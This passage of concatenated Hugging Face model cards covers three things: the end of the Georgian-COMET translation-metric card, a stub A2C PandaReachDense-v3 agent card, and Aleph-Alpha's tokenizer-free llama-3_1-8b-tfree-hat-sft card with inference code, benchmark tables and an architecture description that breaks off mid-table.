mse dropout: 0.1 batch_size: 8 ``` ### Training Procedure 1. **Base Model**: Started from Unbabel/wmt22-comet-da checkpoint 2. **Knowledge Distillation**: Used Claude Sonnet 4 scores as training targets 3. **Robustness**: Added Gaussian noise to training scores to prevent overfitting 4. 
**Optimization**: 8 epochs with early stopping (patience=4) on validation Kendall's tau ## Evaluation Results ### Test Set Performance Evaluated on 400 human-annotated English-Georgian translation pairs: | Metric | Score | p-value | |--------|-------|---------| | Pearson | 0.878 | < 0.001 | | Spearman | 0.796 | < 0.001 | | Kendall | 0.603 | < 0.001 | ### Comparison with Other Metrics | Metric | Pearson | Spearman | Kendall | |--------|---------|----------|---------| | **Georgian-COMET** | **0.878** | 0.796 | 0.603 | | Base COMET | 0.867 | 0.759 | 0.564 | | LLM-Reference-Based | 0.852 | **0.798** | **0.660** | | CHRF++ | 0.739 | 0.690 | 0.498 | | TER | 0.466 | 0.443 | 0.311 | | BLEU | 0.413 | 0.497 | 0.344 | ## Languages Covered While the base model (XLM-R) covers 100+ languages, this fine-tuned version is specifically optimized for: - **Source Language**: English (en) - **Target Language**: Georgian (ka) For other language pairs, we recommend using the base [Unbabel/wmt22-comet-da](https://huggingface.co/Unbabel/wmt22-comet-da) model. ## Limitations 1. **Language Specific**: Optimized only for English→Georgian evaluation 2. **Domain**: Training data primarily from corp.dict.ge (general/literary domain) 3. **Reference Required**: Cannot perform reference-free evaluation 4. **Sentence Level**: Not optimized for document-level evaluation ## Citation If you use this model, please cite: ```bibtex @misc{georgian-comet-2025, title={Georgian-COMET: Fine-tuned COMET for English-Georgian MT Evaluation}, author={Luka Darsalia, Ketevan Bakhturidze, Saba Sturua}, year={2025}, publisher={HuggingFace}, url={https://huggingface.co/Darsala/georgian_comet} } @inproceedings{rei-etal-2022-comet, title = "{COMET}-22: Unbabel-{IST} 2022 Submission for the Metrics Shared Task", author = "Rei, Ricardo and C. de Souza, Jos{\'e} G. and Alves, Duarte and Zerva, Chrysoula and Farinha, Ana C and Glushkova, Taisiya and Lavie, Alon and Coheur, Luisa and Martins, Andr{\'e} F. T.", booktitle = "Proceedings of the Seventh Conference on Machine Translation (WMT)", year = "2022", address = "Abu Dhabi, United Arab Emirates", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/2022.wmt-1.52", pages = "578--585", } ``` ## Acknowledgments - [Unbabel](https://unbabel.com/) team for the base COMET model - [Anthropic](https://anthropic.com/) for Claude Sonnet 4 used in knowledge distillation - [corp.dict.ge](https://corp.dict.ge/) for the Georgian-English corpus - All contributors to the [nmt_metrics_research](https://github.com/LukaDarsalia/nmt_metrics_research) project
Akchunks/a2c-PandaReachDense-v3
Akchunks
2025-05-30T09:50:11Z
0
0
stable-baselines3
[ "stable-baselines3", "PandaReachDense-v3", "deep-reinforcement-learning", "reinforcement-learning", "model-index", "region:us" ]
reinforcement-learning
2025-05-30T09:46:02Z
--- library_name: stable-baselines3 tags: - PandaReachDense-v3 - deep-reinforcement-learning - reinforcement-learning - stable-baselines3 model-index: - name: A2C results: - task: type: reinforcement-learning name: reinforcement-learning dataset: name: PandaReachDense-v3 type: PandaReachDense-v3 metrics: - type: mean_reward value: -0.19 +/- 0.05 name: mean_reward verified: false --- # **A2C** Agent playing **PandaReachDense-v3** This is a trained model of a **A2C** agent playing **PandaReachDense-v3** using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3). ## Usage (with Stable-baselines3) TODO: Add your code ```python from stable_baselines3 import ... from huggingface_sb3 import load_from_hub ... ```
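The usage block above is left as a TODO stub. A minimal sketch for loading the agent with `huggingface_sb3` follows, assuming the checkpoint uses the usual naming convention; the `.zip` filename is hypothetical, so check the repository's file listing.

```python
# Minimal sketch (the checkpoint filename is an assumption; check the repo files).
import gymnasium as gym
import panda_gym  # registers PandaReachDense-v3
from huggingface_sb3 import load_from_hub
from stable_baselines3 import A2C

checkpoint = load_from_hub(
    repo_id="Akchunks/a2c-PandaReachDense-v3",
    filename="a2c-PandaReachDense-v3.zip",  # hypothetical name
)
model = A2C.load(checkpoint)

env = gym.make("PandaReachDense-v3")
obs, _ = env.reset()
action, _ = model.predict(obs, deterministic=True)
print(action)
```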
Aleph-Alpha/llama-3_1-8b-tfree-hat-sft
Aleph-Alpha
2025-05-30T09:50:07Z
11
12
null
[ "safetensors", "hierarchical_autoregressive_transformer", "Aleph Alpha Research", "pytorch", "Hirarchical Autoregressive Transformer", "HAT", "custom_code", "en", "de", "arxiv:2501.10322", "base_model:Aleph-Alpha/llama-3_1-8b-tfree-hat-base", "base_model:finetune:Aleph-Alpha/llama-3_1-8b-tfree-hat-base", "license:other", "region:us" ]
null
2025-04-25T16:36:56Z
--- language: - en - de license: other thumbnail: https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft/raw/main/source/aleph_alpha_logo_thumbnail.png license_name: open-aleph-license license_link: LICENSE base_model: Aleph-Alpha/llama-3_1-8b-tfree-hat-base tags: - Aleph Alpha Research - pytorch - Hirarchical Autoregressive Transformer - HAT model-index: - name: llama-3_1-8b-tfree-hat-sft results: [] --- <div align="center"> <img src="source/aleph_alpha_logo.svg" width="60%" alt="Aleph Alpha Research Logo" /> </div> <div align="center" style="line-height: 1;"> <a href="https://aleph-alpha.com/research/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="source/aleph_alpha_homepage_badge.svg" style="vertical-align: middle;" /> </a> <a href="https://huggingface.co/Aleph-Alpha" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-AlephAlpha%20Research-e3ff00?color=e3ff00&amp;logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://twitter.com/Aleph__Alpha" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-AlephAlpha_Research-white?logo=x&amp;logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-Open Aleph License-white?&amp;color=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <hr> # llama-3_1-8b-tfree-hat-sft <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> This model card provides an overview of our **tokenizer-free llama-3.1-8b-tfree-hat model family** based on Llama, which encompasses three foundation models developed by Aleph Alpha Research* and publicly available under the Open Aleph License, a license explicitly allowing for non-commercial research and educational use. The models are based on the original Llama 3.1 model’s pre-trained backbone, replacing the Llama tokenizer with our Hierarchical Autoregressive Transformer (HAT) architecture which is described originally in our [paper](https://arxiv.org/abs/2501.10322). This novel architecture integrates character-level encoding and decoding with the word-level backbone, allowing for improved text compression (less sequence positions) and performance in the languages it has been trained on, and potentially higher robustness to prompt changes, as well as improved adaptability to new languages & domains via fine-tuning. The models were pre- and post-trained and direct-preference-optimized in English & German on carefully curated data in compliance with applicable EU and national regulations, including copyright and data privacy laws. They show strong proficiency in German, beating the original Llama 3.1 on most benchmarks also in English. The direct-preference-optimization of [llama-3_1-8b-tfree-hat-dpo](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo) prioritizes helpfulness and instruction following, making the model suitable for sensitive applications without the risk of over-refusal. The models have not been optimized for code generation and math and are thus not evaluated extensively on respective benchmarks. 
Please note that the realized inference speed strongly depends on the maturity of the inference implementation beyond the intrinsic text compression of any model. The current publicly available inference implementation is in a non-optimized state, hence any benchmark on speed must take account of that. You can find all model weights and their corresponding safetensors conversions at the following links: | Model Name | Description | | --- | --- | | `llama-3_1-8b-tfree-hat-base` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) - uses the Llama-3.1 8B base pre-trained checkpoint as initialization for the backbone, and has been continuously pre-trained with the HAT architecture in English and German. | | `llama-3_1-8b-tfree-hat-sft` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) - is a supervised fine-tuned `llama-3_1-8b-tfree-hat-base`. | | `llama-3_1-8b-tfree-hat-dpo` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo) - is a direct-preference-optimized `llama-3_1-8b-tfree-hat-sft` | # Model Access We provide access to our models through the channels listed below. - **HuggingFace**: The model’s weights as well as basic inference implementation are available on HuggingFace under the [Open Aleph License](https://github.com/Aleph-Alpha/.github/blob/main/oal.pdf), a license explicitly allowing for non-commercial research and educational use. We do not collect PII (personally identifiable information) for any of these channels. We do not log user inputs to the models. We do not train on user data. **Note**: The same models are made available to users regardless of their geographic location and their input language but subject to sanction regimes, technology export regulations, and other restrictions that may apply. The same offering is provided to all countries within and external to the European Union if no legal restrictions apply. # How to use ## Inference We provide an inference module compatible with HuggingFace Transformers for running model inference. For compatibility between the LLaMA components and our original codebase, we recommend pinning the transformers library to version 4.46.3. Before executing the inference example below, make sure the [hat-splitter package](https://pypi.org/project/hat-splitter/) is installed in your environment. ```shell pip install 'hat-splitter>=0.1.9' 'transformers==4.46.3' torch pip install flash_attn ``` Download model weights and run inference using the following example: ```python import torch from transformers import AutoModelForCausalLM INPUT ="When was Rome founded?" MODEL_ID = "Aleph-Alpha/llama-3_1-8b-tfree-hat-sft" model = AutoModelForCausalLM.from_pretrained( trust_remote_code=True, pretrained_model_name_or_path=MODEL_ID, attn_implementation="flash_attention_2", ).to("cuda", torch.bfloat16) input_ids, cumulative_word_lengths = model._prepare_input(INPUT, add_llama_template=True) model_output = model.generate( input_ids, cumulative_seq_lengths_per_word=cumulative_word_lengths, max_new_tokens=300, use_cache=False, ) print("Prompt: ", INPUT) print("Completion: ", model_output.completion_text) ``` ## Prompt formatting The prompt format used for our models is identical to the [Llama prompt format](https://www.llama.com/docs/model-cards-and-prompt-formats/llama3_1/). We highly recommend using it when prompting the models to ensure optimal performance for the supervised fine-tuned and direct-preference-optimized model versions. 
You can apply the recommended format by setting `add_llama_template=True` in the `model._prepare_input` method. # Evaluation **Performance**: Our T-Free models deliver performance on par with current state-of-the-art OS memory-equivalent models in both English and German. For evaluation purposes, we compare our tokenizer-free base model with [Llama 3.1 8B Base](https://huggingface.co/meta-llama/Llama-3.1-8B), our SFT model with [Tulu 3.1 8B SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT), and our DPO model with [Llama 3.1 8B Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) and [Tulu 3.1 8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B). Respective benchmarks and results can be found in the tables below. **Efficiency**: Our tokenizer-free approach results in improved text compression, providing a foundation for higher inference speed. We measure compression in terms of words processed across all languages and domains. We define the metric as **tokenizer fertility** or **bytes per sequence position**, where a higher value indicates better performance. Latency and throughput are currently out of scope for research-centric evaluations and will be addressed in the future. Currently, our evaluation framework automatically measures **bytes per sequence position** across datasets, allowing us to derive text compression scores and analyze variations across different dataset distributions. The resulting end-to-end efficiency depends on the inference implementation, which is beyond the scope of both the inference code provided here and the reported compression scores. **Disclaimer**: The results presented below were generated using our internal inference implementation, not the inference module mentioned above. As a sanity check, we did reproduce some of the benchmarks using our evaluation framework with the Hugging Face inference code, but some results might still deviate. We plan to make source-available both our evaluation framework and a high-performance vLLM integration for this model in the coming weeks to ensure reproducibility. Our goal with this initial release is to provide the community with a straightforward codebase that demonstrates the architecture and supports basic inference capabilities.
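For concreteness, the compression values reported in the tables below are bytes per sequence position. A minimal sketch of how such a score can be computed for any segmentation is given here; it is illustrative only, not the evaluation framework's code, and the position counts are made-up examples.

```python
# Illustrative only: bytes per sequence position for a given segmentation.
def bytes_per_position(text: str, num_positions: int) -> float:
    return len(text.encode("utf-8")) / num_positions

sample = "Schools and kindergartens were opened."  # 38 UTF-8 bytes
# A word-level backbone might spend one position per word (5 here), while a
# subword tokenizer might need around 8 tokens for the same sentence.
print(bytes_per_position(sample, 5))  # 7.6 bytes per position
print(bytes_per_position(sample, 8))  # 4.75 bytes per position
```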
**Metric Glossary** `log_acc`: Average Accuracy Loglikelihood<br> `norm_log_acc`: Average Normalized Loglikelihood Accuracy<br> `comp_acc`: Average Completion Accuracy<br> `norm_prob_mass`: Average Probability Mass Normalized<br> `bleu`: Average BLEU Score<br> `rouge_gm`: Average ROUGE-Geometric-Mean<br> `F1`: Average F1<br> `CS`: Chatbot Style<br> `IF`: Instruction Following<br> `LC`: Language Consistency<br> `CI`: Concordance Index<br> `ES`: Exponential Similarity ## Pre-training Benchmarks | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-base](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [llama-3_1-8b-tfree-hat-base](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) Compression | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | `norm_log_acc` | 5 | 0.657 | **0.668** | **5.184** | 4.278 | | Knowledge | Full Text MMLU | `norm_log_acc` | 5 | **0.638** | 0.624 | **5.307** | 4.557 | | Knowledge | MMLU Pro | `norm_log_acc` | 5 | **0.368** | 0.367 | **4.734** | 3.731 | | Knowledge | GPQA | `log_acc` | 0 | **0.308** | 0.306 | **4.932** | 3.519 | | Knowledge | BBH | `norm_log_acc` | 3 | **0.473** | 0.472 | **4.665** | 3.788 | | Knowledge | OpenBookQA | `norm_log_acc` | 10 | 0.466 | **0.478** | **4.982** | 4.724 | | Knowledge | TriviaQA | `comp_acc` | 5 | 0.623 | **0.695** | **5.324** | 4.218 | | Knowledge | TruthfulQA | `norm_prob_mass` | 6 | **0.166** | **0.166** | **6.575** | 4.197 | | Reasoning | ARC Easy | `norm_log_acc` | 25 | **0.870** | 0.858 | **5.526** | 4.936 | | Reasoning | ARC Challenge | `norm_log_acc` | 25 | **0.625** | 0.579 | **5.514** | 4.924 | | Reasoning | Winogrande | `norm_log_acc` | 5 | 0.691 | **0.695** | **5.158** | 4.909 | | Reasoning | HellaSwag | `norm_log_acc` | 10 | 0.793 | **0.817** | **5.338** | 4.655 | | German | MMMLU | `norm_log_acc` | 5 | **0.591** | 0.578 | **6.056** | 3.410 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.778** | 0.713 | **6.604** | 3.685 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.538** | 0.473 | **6.571** | 3.684 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | `norm_log_acc` | 5 | **0.789** | 0.765 | **5.627** | 3.671 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | `norm_log_acc` | 10 | **0.646** | 0.626 | **6.496** | 3.666 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | `norm_prob_mass` | 6 | **0.166** | **0.166** | **6.006** | 3.406 | | German | Lambada | `comp_acc` | 5 | **0.454** | 0.449 | **5.777** | 3.552 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | `comp_acc` | 8 | **0.440** | 0.406 | **4.372** | 2.932 | | German | WMT16 | `bleu` | 3 | **36.025** | 32.873 | **6.203** | 4.204 | | Math | GSM8K | `comp_acc` | 8 | **0.509** | **0.509** | **3.838** | 3.334 | | Long context | GSM8K | `comp_acc` | 16 | **0.540** | 0.478 | **3.839** | 3.340 | | Safety | Winogender | `norm_log_acc` | 5 | 0.624 | **0.626** | **5.232** | 4.799 | ## SFT Benchmarks **MTBench winrates** German MTBench numbers are based on our [German version of MTBench](https://huggingface.co/datasets/Aleph-Alpha/MTBench-German). 
| | **vs.** allenai/Llama-3.1-Tulu-3-8B-SFT **(Eng)** | **vs.** allenai/Llama-3.1-Tulu-3-8B-SFT **(Ger)** | | --- | --- | --- | | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) | **65.0** | **64.1** | | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) | [Llama-3.1-Tulu-3-8B-SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT) | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) Compression | [Llama-3.1-Tulu-3-8B-SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | norm\_log\_acc | 5 | 0.655 | **0.669** | **5.818** | 4.153 | | Knowledge | Full Text MMLU | norm\_log\_acc | 5 | 0.653 | **0.671** | **5.849** | 4.408 | | Knowledge | MMLU Pro | norm\_log\_acc | 5 | **0.377** | 0.317 | **5.135** | 4.077 | | Knowledge | GPQA | log\_acc | 0 | 0.288 | **0.260** | **5.260** | 3.408 | | Knowledge | BBH | norm\_log\_acc | 3 | 0.492 | **0.494** | **5.332** | 3.668 | | Knowledge | OpenBookQA | norm\_log\_acc | 10 | 0.486 | **0.504** | **7.101** | 4.041 | | Knowledge | TriviaQA | comp\_acc | 5 | 0.585 | **0.648** | **6.963** | 3.928 | | Knowledge | TruthfulQA | norm\_prob\_mass | 6 | **0.171** | 0.167 | **6.575** | 3.807 | | Reasoning | ARC Easy | norm\_log\_acc | 25 | **0.890** | 0.877 | **7.018** | 4.497 | | Reasoning | ARC Challenge | norm\_log\_acc | 25 | **0.647** | 0.617 | **6.860** | 4.522 | | Reasoning | Winogrande | norm\_log\_acc | 5 | 0.680 | **0.700** | **6.856** | 4.116 | | Reasoning | HellaSwag | norm\_log\_acc | 10 | 0.748 | **0.802** | **5.980** | 4.427 | | German | MMMLU | norm\_log\_acc | 5 | **0.595** | 0.572 | **6.630** | 3.383 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | norm\_log\_acc | 25 | **0.800** | 0.742 | **7.872** | 3.607 | | German | [ARC Challenge DE](https://huggingface.co/datasets/openGPT-X/arcx) | norm\_log\_acc | 25 | **0.573** | 0.500 | **7.798** | 3.610 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | norm\_log\_acc | 5 | **0.763** | 0.754 | **7.225** | 3.391 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | norm\_log\_acc | 10 | 0.616 | **0.636** | **6.971** | 3.603 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | norm\_prob\_mass | 6 | **0.167** | 0.166 | **7.378** | 3.276 | | German | Lambada | comp\_acc | 5 | 0.366 | **0.488** | **6.429** | 3.493 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | comp\_acc | 8 | 0.556 | **0.598** | **4.835** | 2.951 | | German | WMT16 | bleu | 3 | **35.770** | 34.302 | **6.806** | 3.999 | | German | WMT16 Instruct | bleu | 3 | **36.400** | 34.297 | **6.862** | 4.062 | | Instruction Following | Alpaca Eval | CS | 0 | **0.334** | 0.104 | **5.386** | 3.968 | | Instruction Following | Alpaca Eval | IF | 0 | **0.913** | 0.908 | **5.386** | 3.968 | | Instruction Following | Alpaca Eval | LC | 0 | **0.996** | 0.986 | **5.386** | 3.968 | | Long context | QuALITY | log\_acc | 0 | 0.388 | **0.414** | **4.867** | 4.274 | | Long context | ZeroSCROLLS GovReport | rouge\_gm | 0 | **0.264** | 0.190 | **6.011** | 5.074 | | Long context | ZeroSCROLLS BookSumSort | CI | 0 | 0.073 | **0.131** | **5.412** | 4.411 | | Long context | ZeroSCROLLS SummScreenFD | rouge\_gm | 0 | **0.122** | 0.088 | **4.896** | 4.093 | | Long context 
| ZeroSCROLLS MuSiQue | F1 | 0 | **0.307** | 0.182 | **5.638** | 4.387 | | Long context | ZeroSCROLLS Qasper | F1 | 0 | **0.281** | 0.180 | **5.932** | 4.807 | | Long context | ZeroSCROLLS QuALITY | log\_acc | 0 | **0.762** | 0.714 | **4.565** | 4.216 | | Long context | ZeroSCROLLS SpaceDigest | ES | 0 | 0.294 | **0.499** | **6.382** | 4.506 | | Long context | ZeroSCROLLS QMSum | rouge\_gm | 0 | 0.134 | **0.154** | **5.445** | 4.266 | | Long context | ZeroSCROLLS SQuALITY | rouge\_gm | 0 | **0.144** | 0.122 | **5.053** | 4.213 | | Long context | Ada-LEval TextSort Choices | log\_acc | 0 | 0.25 | **0.283** | **5.106** | 4.108 | | Long context | Ada-LEval TextSort | comp\_acc | 0 | **0.06** | 0.05 | **5.107** | 4.153 | | Safety | Winogender | norm\_log\_acc | 5 | 0.550 | **0.583** | **6.875** | 4.157 | ## DPO Benchmarks **MTBench winrates** German MTBench numbers are based on our German version of [MTBench](https://huggingface.co/datasets/Aleph-Alpha/MTBench-German). | | **vs.** [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) **(Eng)** | **vs.** [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) **(Eng)** | **vs.** [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) **(Ger)** | **vs.** [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) **(Ger)** | | --- | --- | --- | --- | --- | | llama-3_1-8b-tfree-hat-dpo | **61.6** | **51.3** | **70.9** | **50.9** | | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-dpo]((https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo)) | [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) | [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) | [llama-3_1-8b-tfree-hat-dpo]((https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo)) Compression | [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) Compression | [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | `norm_log_acc` | 5 | 0.657 | **0.681** | 0.664 | **5.818** | 4.885 | 4.153 | | Knowledge | Full Text MMLU | `norm_log_acc` | 5 | 0.662 | **0.680** | 0.677 | **5.849** | 5.075 | 4.408 | | Knowledge | MMLU Pro | `norm_log_acc` | 5 | 0.382 | **0.402** | 0.322 | **5.135** | 4.077 | 4.077 | | Knowledge | GPQA | `log_acc` | 0 | 0.279 | **0.306** | 0.271 | **5.260** | 3.771 | 3.408 | | Knowledge | BBH | `norm_log_acc` | 3 | 0.501 | **0.522** | 0.494 | **5.332** | 4.374 | 3.668 | | Knowledge | OpenBookQA | `norm_log_acc` | 10 | 0.498 | 0.526 | **0.528** | **7.101** | 6.973 | 4.041 | | Knowledge | TriviaQA | `comp_acc` | 5 | 0.416 | **0.646** | 0.612 | **6.886** | 6.020 | 3.934 | | Knowledge | TruthfulQA | `norm_prob_mass` | 6 | **0.178** | 0.171 | 0.173 | **6.575** | 5.553 | 3.807 | | Reasoning | ARC Easy | `norm_log_acc` | 25 | **0.896** | 0.875 | 0.873 | **7.018** | 6.396 | 4.497 | | Reasoning | ARC Challenge | `norm_log_acc` | 25 | **0.667** | 0.638 | 0.650 | **6.860** | 6.218 | 4.522 | | Reasoning | Winogrande | `norm_log_acc` | 5 | **0.686** | 0.657 | 0.683 | **6.856** | 6.517 | 4.116 | | Reasoning | HellaSwag | `norm_log_acc` | 10 | 0.776 | 0.776 | **0.807** | **5.980** | 5.274 | 4.427 | | German | MMMLU | `norm_log_acc` | 5 | **0.598** | 0.590 | 0.572 | **6.630** | 3.912 | 3.383 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | 
`norm_log_acc` | 25 | **0.811** | 0.729 | 0.751 | **7.872** | 4.910 | 3.607 | | German | [ARC Challenge DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.597** | 0.503 | 0.525 | **7.798** | 4.862 | 3.610 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | `norm_log_acc` | 5 | **0.751** | 0.729 | 0.711 | **7.225** | 5.310 | 3.391 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | `norm_log_acc` | 10 | **0.687** | 0.626 | 0.657 | **6.971** | 4.137 | 3.603 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | `norm_prob_mass` | 6 | **0.173** | 0.168 | 0.171 | **7.378** | 4.581 | 3.276 | | German | Lambada | `comp_acc` | 5 | 0.381 | **0.421** | 0.428 | **6.418** | 4.191 | 3.494 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | `comp_acc` | 8 | 0.540 | 0.201 | **0.724** | **4.860** | 3.320 | 2.963 | | German | WMT16 | `bleu` | 3 | **34.395** | 34.224 | 32.912 | **6.805** | 5.061 | 4.000 | | German | WMT16 Instruct | `bleu` | 3 | **34.717** | 34.260 | 33.089 | **6.635** | 5.130 | 4.063 | | Math | GSM8K | `comp_acc` | 8 | 0.664 | 0.757 | **0.870** | **4.351** | 3.794 | 3.356 | | Instruction Following | Alpaca Eval | `CS` | 0 | **0.403** | 0.209 | 0.109 | **5.478** | 4.701 | 4.442 | | Instruction Following | Alpaca Eval | `IF` | 0 | 0.927 | 0.935 | **0.952** | **5.478** | 4.701 | 4.442 | | Instruction Following | Alpaca Eval | `LC` | 0 | **0.996** | 0.995 | 0.985 | **5.478** | 4.701 | 4.442 | | Long context | QuALITY | `log_acc` | 0 | 0.384 | 0.412 | **0.425** | **4.867** | 4.290 | 4.274 | | Long context | ZeroSCROLLS GovReport | `rouge_gm` | 0 | **0.308** | 0.246 | 0.261 | **6.034** | 5.105 | 5.107 | | Long context | ZeroSCROLLS BookSumSort | `CI` | 0 | 0.015 | 0.037 | **0.141** | 4.255 | **4.418** | 4.411 | | Long context | ZeroSCROLLS SummScreenFD | `rouge_gm` | 0 | **0.111** | 0.107 | 0.098 | **4.824** | 3.761 | 3.752 | | Long context | ZeroSCROLLS MuSiQue | `F1` | 0 | **0.230** | 0.200 | 0.145 | **5.637** | 4.427 | 4.387 | | Long context | ZeroSCROLLS Qasper | `F1` | 0 | 0.251 | **0.235** | 0.221 | **5.933** | 4.826 | 4.808 | | Long context | ZeroSCROLLS QuALITY | `log_acc` | 0 | **0.810** | 0.810 | 0.714 | **4.565** | 4.230 | 4.215 | | Long context | ZeroSCROLLS SpaceDigest | `ES` | 0 | 0.316 | **0.638** | 0.490 | **5.183** | 4.518 | 4.505 | | Long context | ZeroSCROLLS QMSum | `rouge_gm` | 0 | 0.134 | 0.142 | **0.144** | **5.041** | 4.279 | 4.277 | | Long context | ZeroSCROLLS SQuALITY | `rouge_gm` | 0 | **0.164** | 0.164 | 0.163 | **4.967** | 4.240 | 4.241 | | Long context | Ada-LEval TextSort Choices | `log_acc` | 0 | 0.260 | **0.282** | 0.275 | **5.106** | 4.117 | 4.108 | | Long context | Ada-LEval TextSort | `comp_acc` | 0 | **0.06** | 0.036 | 0.05 | **5.107** | 4.159 | 4.154 | | Safety | Winogender | `norm_log_acc` | 5 | 0.568 | **0.639** | 0.597 | **6.875** | 6.603 | 4.157 | # Training Details ## Model Architecture The model uses a hierarchical autoregressive architecture consisting of three components: encoder, backbone, and decoder together with connector layers between components. Encoder, backbone, and decoder are all instances of autoregressive transformers with pre-norm residual blocks in the style of Llama, using a SwiGLU unit as a feed-forward block, with all model parameters active during training and inference. 
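To make the block structure above concrete, the following is a minimal sketch of a SwiGLU feed-forward block, assuming a PyTorch implementation; the class name and sizes are illustrative (the sizes match the backbone configuration listed further below) and this is not the actual training code.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class SwiGLU(nn.Module):
    """Llama-style SwiGLU feed-forward block: down(silu(gate(x)) * up(x))."""

    def __init__(self, d_model: int, expansion: float):
        super().__init__()
        hidden = int(d_model * expansion)
        self.gate_proj = nn.Linear(d_model, hidden, bias=False)
        self.up_proj = nn.Linear(d_model, hidden, bias=False)
        self.down_proj = nn.Linear(hidden, d_model, bias=False)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # SiLU-gated hidden state, then projection back to the model width.
        return self.down_proj(F.silu(self.gate_proj(x)) * self.up_proj(x))

# Illustrative sizes: backbone hidden size 4096 with MLP expansion factor 3.5.
block = SwiGLU(d_model=4096, expansion=3.5)
out = block(torch.randn(1, 8, 4096))  # (batch, sequence, hidden)
```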
The backbone model uses standard causal attention, while the encoder and decoder use local causal attention with a finite look-back window. The encoder processes input text as a sequence of UTF-8 bytes and produces a sequence of activations of the same length. This sequence is then split into chunks corresponding to words or other semantic units in the text (this is further explained below). In the encoder-backbone connector layer, for each word, a learned latent vector cross-attends to its corresponding chunk of encoder activations. The resulting sequence of latent vectors then serves as input to the backbone. The backbone processes this latent sequence and produces a sequence of word-level representations. Finally, the decoder module is another transformer that acts on the byte-level activations and has an LM head that produces next-byte probabilities. To make use of the higher level information stored in the word-level embeddings during decoding, another cross-attention mechanism is used. In each transformer block of the decoder, every byte-level position cross-attends to the backbone’s word-level representations that correspond to the words preceding this byte. ## Encoder module | | **8B** | | --- | --- | | Number of layers | 6 | | 